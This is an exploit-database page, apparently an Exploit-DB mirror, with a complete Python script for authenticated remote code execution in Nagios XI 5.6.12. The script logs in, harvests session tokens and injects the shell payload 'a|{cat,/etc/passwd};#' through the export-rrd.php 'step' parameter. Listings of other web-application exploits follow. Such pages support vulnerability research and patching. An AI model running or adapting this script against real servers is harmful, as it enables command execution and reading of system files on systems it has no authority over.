Search for hundreds of thousands of exploits

"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"

Author

Exploit author

"Basim Alabdullah"

Platform

Exploit platform

php

Release date

Exploit published date

2020-07-06

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# Exploit Title: Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution
# Date: 2020-04-11
# Exploit Author: Basim Alabdullah
# Vendor homepage: https://www.nagios.com
# Version: 5.6.12
# Software link: https://www.nagios.com/downloads/nagios-xi/
# Tested on: CentOS REDHAT 7.7.1908 (core)
#
#                 Authenticated Remote Code Execution
#

import requests
import sys
import re


uname=sys.argv[2]
upass=sys.argv[3]
ipvictim=sys.argv[1]

with requests.session() as s:
    urlz=ipvictim+"/login.php"
    headers = {
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'en-US,en;q=0.8',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Referer': ipvictim+'/index.php',
        'Connection': 'keep-alive'
    }
    response = s.get(urlz, headers=headers)
    txt=response.text
    x=re.findall('var nsp_str = "(.*?)"', txt)
    for xx in x:
        login = {
        'username':uname,
        'password':upass,
        'nsp':xx,
        'page':'auth',
        'debug':'',
        'pageopt':'login',
        'redirect':ipvictim+'/index.php',
        'loginButton':''
        }
        rev=s.post(ipvictim+"/login.php",data=login , headers=headers)
        cmd=s.get(ipvictim+"/includes/components/ccm/?cmd=modify&type=host&id=1&page=1",allow_redirects=True)
        txt1=cmd.text
        xp=re.findall('var nsp_str = "(.*?)"', txt1)
        for xxp in xp:
            payload = "a|{cat,/etc/passwd};#"
            exploit=s.get(ipvictim+"/includes/components/xicore/export-rrd.php?host=localhost&service=Root%20Partition&start=011&end=012&step="+payload+"&type=a&nsp="+xxp)
            print(exploit.text)
Release DateTitleTypePlatformAuthor
2020-09-16"Piwigo 2.10.1 - Cross Site Scripting"webappsphpIridium
2020-09-15"Tailor MS 1.0 - Reflected Cross-Site Scripting"webappsphpboku
2020-09-15"ThinkAdmin 6 - Arbitrarily File Read"webappsphpHzllaga
2020-09-14"Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)"webappsphp"Mehmet Kelepçe"
2020-09-10"CuteNews 2.1.2 - Remote Code Execution"webappsphp"Musyoka Ian"
2020-09-09"Tailor Management System - 'id' SQL Injection"webappsphpMosaaed
2020-09-07"grocy 2.7.1 - Persistent Cross-Site Scripting"webappsphp"Mufaddal Masalawala"
2020-09-03"BloodX CMS 1.0 - Authentication Bypass"webappsphpBKpatron
2020-09-03"Daily Tracker System 1.0 - Authentication Bypass"webappsphp"Adeeb Shah"
2020-09-03"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)"webappsphpV1n1v131r4
Release DateTitleTypePlatformAuthor
2020-07-06"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-04-20"Centreon 19.10.5 - 'id' SQL Injection"webappsphp"Basim Alabdullah"
2020-04-10"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal"webappscgi"Basim Alabdullah"
2020-04-03"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution"webappsphp"Basim Alabdullah"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48640/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.